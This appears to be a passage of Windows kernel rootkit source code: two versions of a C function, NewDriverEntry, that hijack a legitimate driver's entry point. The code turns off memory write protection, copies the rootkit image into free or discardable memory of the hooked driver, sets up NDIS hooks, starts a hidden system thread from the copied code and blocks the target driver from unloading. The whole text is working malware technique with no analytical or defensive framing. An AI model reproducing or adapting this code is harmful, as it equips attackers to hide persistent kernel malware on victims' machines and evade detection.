//--------------------------------------------------------------------------------------
NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
// disable memory write protection
ClearWp();
// restore original code from image entry point
memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);
// enable memory write protection
SetWp();
NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);
DbgMsg(__FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns);
if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS)
{
m_bDriverMustBeFreed = TRUE;
}
if (NT_SUCCESS(ns))
{
PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize);
if (Image)
{
// prepare rootkit code for injection into the discardable sections
memcpy(Image, m_DriverBase, m_DriverSize);
RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset));
// disable memory write protection
ClearWp();
memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize);
// enable memory write protection
SetWp();
PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset;
// set up NDIS hooks
DriverEntryInitializePayload(PointerFixup);
PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread);
DbgMsg(__FUNCTION__"(): Start address: "IFMT"\n", Start);
// create thread for execution copied code
HANDLE hThread = NULL;
ns = PsCreateSystemThread(
&hThread,
THREAD_ALL_ACCESS,
NULL, NULL, NULL,
Start,
m_bDriverMustBeFreed ? m_DriverBase : NULL
);
if (NT_SUCCESS(ns))
{
ZwClose(hThread);
}
else
{
DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns);
}
ExFreePool(Image);
}
// don't allow to unload target driver
DriverObject->DriverUnload = NULL;
}
return ns;
}
//--------------------------------------------------------------------------------------
NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
// disable memory write protection
ForEachProcessor(ClearWp, NULL);
// restore original code from image entry point
memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);
// enable memory write protection
ForEachProcessor(SetWp, NULL);
NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);
DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns);
if (NT_SUCCESS(ns))
{
PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)
((PUCHAR)m_Self->DllBase + ((PIMAGE_DOS_HEADER)m_Self->DllBase)->e_lfanew);
PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)
(pHeaders->FileHeader.SizeOfOptionalHeader +
(PUCHAR)&pHeaders->OptionalHeader);
// disable memory write protection
ForEachProcessor(ClearWp, NULL);
// copy driver headers to the founded area
RtlFillMemory(m_FreeAreaVA, m_FreeAreaLength, 0);
RtlCopyMemory(m_FreeAreaVA, m_Self->DllBase, pHeaders->OptionalHeader.SizeOfHeaders);
// copy sections
for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)
{
PVOID DataPtr = (PUCHAR)m_Self->DllBase + pSection->VirtualAddress;
if (MmIsAddressValid(DataPtr))
{
RtlCopyMemory(
(PUCHAR)m_FreeAreaVA + pSection->VirtualAddress,
DataPtr,
min(pSection->SizeOfRawData, pSection->Misc.VirtualSize)
);
}
pSection += 1;
}
// reallocate copied image to the new address
LdrProcessRelocs(
m_FreeAreaVA, (PVOID)((PUCHAR)pHeaders->OptionalHeader.ImageBase -
(PUCHAR)m_Self->DllBase + (PUCHAR)m_FreeAreaVA)
);
// enable memory write protection
ForEachProcessor(SetWp, NULL);
PKSTART_ROUTINE Start = (PKSTART_ROUTINE)((PUCHAR)DriverEntryContinueThread -
(PUCHAR)m_Self->DllBase + (PUCHAR)m_FreeAreaVA);
// create thread for execution copied driver code
HANDLE hThread = NULL;
ns = PsCreateSystemThread(
&hThread,
THREAD_ALL_ACCESS,
NULL, NULL, NULL,
Start,
NULL
);
if (NT_SUCCESS(ns))
{
ZwClose(hThread);
}
else
{
DbgMsg(__FILE__, __LINE__, "PsCreateSystemThread() fails; status: 0x%.8x\n", ns);
}
// don't allow to unload target driver
DriverObject->DriverUnload = NULL;
}
return ns;
}
